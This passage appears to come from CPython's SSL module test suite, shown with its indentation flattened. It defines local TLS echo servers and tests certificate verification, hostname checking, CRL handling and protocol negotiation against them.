test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
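# ThreadedEchoServer runs a TLS echo server in a background thread
# (optionally starting in clear text for the STARTTLS tests); the tests
# below use it as a context manager and connect to (HOST, server.port).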
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(True)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ConnectionResetError, BrokenPipeError, ConnectionAbortedError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# BrokenPipeError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake.
# https://github.com/openssl/openssl/issues/6342
#
# ConnectionAbortedError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake when using WinSock.
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.close()
return False
except (ssl.SSLError, OSError) as e:
# OSError may occur with wrong protocols, e.g. both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
# bpo-44229, bpo-43855, bpo-44237, and bpo-33450:
# Ignore spurious EPROTOTYPE returned by write() on macOS.
# See also http://erickt.github.io/blog/2014/11/19/adventures-in-debugging-a-potential-osx-kernel-bug/
if e.errno != errno.EPROTOTYPE and sys.platform != "darwin":
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
if cert_binary is None:
sys.stdout.write(" client did not provide a cert\n")
else:
sys.stdout.write(f" cert binary is {len(cert_binary)}b\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
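# run() implements a tiny line-based command protocol used by the
# tests: b'over' closes the connection, b'STARTTLS'/b'ENDTLS' switch
# TLS on and off, b'CB tls-unique' returns channel-binding data,
# b'PHA' triggers post-handshake auth, b'HASCERT'/b'GETCERT' and
# b'VERIFIEDCHAIN'/b'UNVERIFIEDCHAIN' report peer certificate info;
# anything else is echoed back lowercased.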
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
elif stripped == b'PHA':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: initiating post handshake auth\n")
try:
self.sslconn.verify_client_post_handshake()
except ssl.SSLError as e:
self.write(repr(e).encode("us-ascii") + b"\n")
else:
self.write(b"OK\n")
elif stripped == b'HASCERT':
if self.sslconn.getpeercert() is not None:
self.write(b'TRUE\n')
else:
self.write(b'FALSE\n')
elif stripped == b'GETCERT':
cert = self.sslconn.getpeercert()
self.write(repr(cert).encode("us-ascii") + b"\n")
elif stripped == b'VERIFIEDCHAIN':
certs = self.sslconn._sslobj.get_verified_chain()
self.write(len(certs).to_bytes(1, "big") + b"\n")
elif stripped == b'UNVERIFIEDCHAIN':
certs = self.sslconn._sslobj.get_unverified_chain()
self.write(len(certs).to_bytes(1, "big") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except OSError as e:
# handles SSLError and socket errors
if self.server.chatty and support.verbose:
if isinstance(e, ConnectionError):
# OpenSSL 1.1.1 sometimes raises
# ConnectionResetError when connection is not
# shut down gracefully.
print(
f" Connection reset by peer: {self.addr}"
)
else:
handle_error("Test server failure:\n")
try:
self.write(b"ERROR\n")
except OSError:
pass
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = socket_helper.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(1.0)
self.sock.listen(5)
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except TimeoutError as e:
if support.verbose:
sys.stdout.write(f' connection timeout {e!r}\n')
except KeyboardInterrupt:
self.stop()
except BaseException as e:
if support.verbose and self.chatty:
sys.stdout.write(
' connection handling failed: ' + repr(e) + '\n')
self.close()
def close(self):
if self.sock is not None:
self.sock.close()
self.sock = None
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer(asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
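# readable() drains any application data that OpenSSL has already
# decrypted and buffered (pending() bytes), since select() only sees
# the raw socket and would otherwise miss it.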
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = socket_helper.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
with warnings_helper.check_warnings():
# ignore Deprecation warnings
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
min_version = PROTOCOL_TO_TLS_VERSION.get(client_protocol, None)
if (min_version is not None
# SSLContext.minimum_version is only available on recent OpenSSL
# (setter added in OpenSSL 1.1.0, getter added in OpenSSL 1.1.1)
and hasattr(server_context, 'minimum_version')
and server_protocol == ssl.PROTOCOL_TLS
and server_context.minimum_version > min_version
):
# If OpenSSL configuration is strict and requires more recent TLS
# version, we have to change the minimum to test old TLS versions.
with warnings_helper.check_warnings():
server_context.minimum_version = min_version
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
seclevel_workaround(server_context, client_context)
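# Both contexts get the requested verify mode, a certificate and the
# signing CA, so CERT_OPTIONAL/CERT_REQUIRED handshakes can verify the
# peer in either direction.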
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(SIGNED_CERTFILE)
ctx.load_verify_locations(SIGNING_CA)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn(
'Cannot create a client socket with a PROTOCOL_TLS_SERVER context',
str(e.exception)
)
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn(
'Cannot create a client socket with a PROTOCOL_TLS_SERVER context',
str(e.exception)
)
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn(
'Cannot create a client socket with a PROTOCOL_TLS_SERVER context',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# getpeercert() raises ValueError until the handshake is
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(
ssl.CertificateError,
"Hostname mismatch, certificate is not valid for 'invalid'."):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
@unittest.skipUnless(
ssl.HAS_NEVER_CHECK_COMMON_NAME, "test requires hostname_checks_common_name"
)
def test_hostname_checks_common_name(self):
client_context, server_context, hostname = testing_context()
assert client_context.hostname_checks_common_name
client_context.hostname_checks_common_name = False
# default cert has a SAN
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
client_context, server_context, hostname = testing_context(NOSANFILE)
client_context.hostname_checks_common_name = False
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLCertVerificationError):
s.connect((HOST, server.port))
def test_ecc_cert(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC cert
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_dual_rsa_ecc(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
# TODO: fix TLSv1.3 once SSLContext can restrict signature
# algorithms.
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# only ECDSA certs
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC and RSA key/cert pairs
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
server_context.load_cert_chain(SIGNED_CERTFILE)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_check_hostname_idn(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(IDNSANSFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify, when specified in several
# different ways
idn_hostnames = [
('könig.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
(b'xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('königsgäßchen.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
('xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
(b'xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
# ('königsgäßchen.idna2008.pythontest.net',
# 'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
('xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
(b'xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
]
for server_hostname, expected_hostname in idn_hostnames:
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=server_hostname) as s:
self.assertEqual(s.server_hostname, expected_hostname)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertEqual(s.server_hostname, expected_hostname)
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="python.example.org") as s:
with self.assertRaises(ssl.CertificateError):
s.connect((HOST, server.port))
def test_wrong_cert_tls12(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
# require TLS client authentication
server_context.verify_mode = ssl.CERT_REQUIRED
# TLS 1.3 has a different handshake
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
@requires_tls_version('TLSv1_3')
def test_wrong_cert_tls13(self):
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.minimum_version = ssl.TLSVersion.TLSv1_3
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname,
suppress_ragged_eofs=False) as s:
# TLS 1.3 performs the client cert exchange after the handshake
s.connect((HOST, server.port))
try:
s.write(b'data')
s.read(1000)
s.write(b'should have failed already')
s.read(1000)
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = socket_helper.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@requires_tls_version('SSLv2')
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if has_tls_version('SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@requires_tls_version('SSLv3')
def test_protocol_sslv3(self):
